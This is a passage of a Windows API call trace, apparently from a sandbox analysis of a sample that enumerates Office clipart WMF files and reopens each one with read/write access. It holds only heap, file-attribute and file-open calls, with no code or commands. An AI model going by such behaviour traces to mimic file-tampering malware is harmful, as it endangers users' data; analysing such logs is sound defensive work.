lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.060] AreFileApisANSI () returned 1 [0102.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0102.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 69 [0102.060] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x687c)) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0102.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.060] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD07804_.WMF", cAlternateFileName="")) returned 1 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.061] AreFileApisANSI () returned 1 [0102.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.061] AreFileApisANSI () returned 1 [0102.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0102.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 69 [0102.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.062] GetFileType (hFile=0x33c) returned 0x1 [0102.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.062] CloseHandle (hObject=0x33c) returned 1 [0102.063] AreFileApisANSI () returned 1 [0102.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0102.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 69 [0102.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.063] GetFileType (hFile=0x33c) returned 0x1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.063] CloseHandle (hObject=0x33c) returned 1 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.064] AreFileApisANSI () returned 1 [0102.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 69 [0102.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133c)) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0102.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD07831_.WMF", cAlternateFileName="")) returned 1 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0102.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.066] AreFileApisANSI () returned 1 [0102.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0102.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.066] AreFileApisANSI () returned 1 [0102.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 69 [0102.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.066] GetFileType (hFile=0x33c) returned 0x1 [0102.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.067] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.067] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.067] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.067] CloseHandle (hObject=0x33c) returned 1 [0102.068] AreFileApisANSI () returned 1 [0102.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 